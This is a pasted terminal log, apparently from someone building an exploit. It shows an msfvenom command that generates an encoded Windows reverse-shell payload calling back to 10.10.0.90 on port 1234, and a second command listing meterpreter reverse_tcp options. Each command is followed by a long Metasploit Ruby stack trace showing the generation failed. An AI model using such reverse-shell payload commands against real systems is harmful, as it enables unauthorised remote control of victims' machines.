Guest User

Untitled

a guest
Jun 22nd, 2018
127
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.93 KB | None | 0 0
  1. msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.0.90 lport=1234 -e x86/unicode_mixed -b 'x00x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff' BufferRegister=EAX -f python
  2.  
  3. Traceback (most recent call last):
  4. 25: from /usr/bin/msfvenom:339:in `<main>'
  5. 24: from /usr/bin/msfvenom:55:in `framework'
  6. 23: from /usr/bin/msfvenom:46:in `init_framework'
  7. 22: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
  8. 21: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
  9. 20: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
  10. 19: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
  11. 18: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
  12. 17: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
  13. 16: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
  14. 15: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
  15. 14: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
  16. 13: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
  17. 12: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
  18. 11: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
  19. 10: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
  20. 9: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
  21. 8: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
  22. 7: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
  23. 6: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
  24. 5: from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
  25. 4: from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
  26. 3: from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_http.rb:48:in `generate_jar'
  27. 2: from /usr/share/metasploit-framework/lib/msf/core/payload/uuid/options.rb:46:in `generate_uri_uuid_mode'
  28. 1: from /usr/share/metasploit-framework/lib/rex/payloads/meterpreter/uri_checksum.rb:70:in `generate_uri_uuid'
  29. /usr/share/metasploit-framework/lib/msf/core/payload/uuid.rb:356:in `to_uri': undefined method `encode_base64url' for Rex::Text:Module (NoMethodError)
  30.  
  31. msfvenom -p windows/meterpreter/reverse_tcp --payload-options
  32.  
  33. raceback (most recent call last):
  34. 36: from /usr/bin/msfvenom:321:in `<main>'
  35. 35: from /usr/bin/msfvenom:55:in `framework'
  36. 34: from /usr/bin/msfvenom:46:in `init_framework'
  37. 33: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
  38. 32: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
  39. 31: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
  40. 30: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
  41. 29: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
  42. 28: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
  43. 27: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
  44. 26: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
  45. 25: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
  46. 24: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
  47. 23: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
  48. 22: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:237:in `load_modules'
  49. 21: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:30:in `each_module_reference_name'
  50. 20: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:30:in `foreach'
  51. 19: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:40:in `block in each_module_reference_name'
  52. 18: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/file.rb:132:in `find'
  53. 17: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/file.rb:132:in `catch'
  54. 16: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rex-core-0.1.13/lib/rex/file.rb:133:in `block in find'
  55. 15: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:50:in `block (2 levels) in each_module_reference_name'
  56. 14: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:238:in `block in load_modules'
  57. 13: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:183:in `load_module'
  58. 12: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:73:in `on_module_load'
  59. 11: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:198:in `add_module'
  60. 10: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:198:in `new'
  61. 9: from /usr/share/metasploit-framework/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb:34:in `initialize'
  62. 8: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `require'
  63. 7: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:240:in `load_dependency'
  64. 6: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `block in require'
  65. 5: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require_with_backports'
  66. 4: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require'
  67. 3: from /usr/share/metasploit-framework/lib/msf/core/opt.rb:3:in `<top (required)>'
  68. 2: from /usr/share/metasploit-framework/lib/msf/core/opt.rb:16:in `<module:Msf>'
  69. 1: from /usr/share/metasploit-framework/lib/msf/core/opt.rb:111:in `<module:Opt>'
Add Comment
Please, Sign In to add comment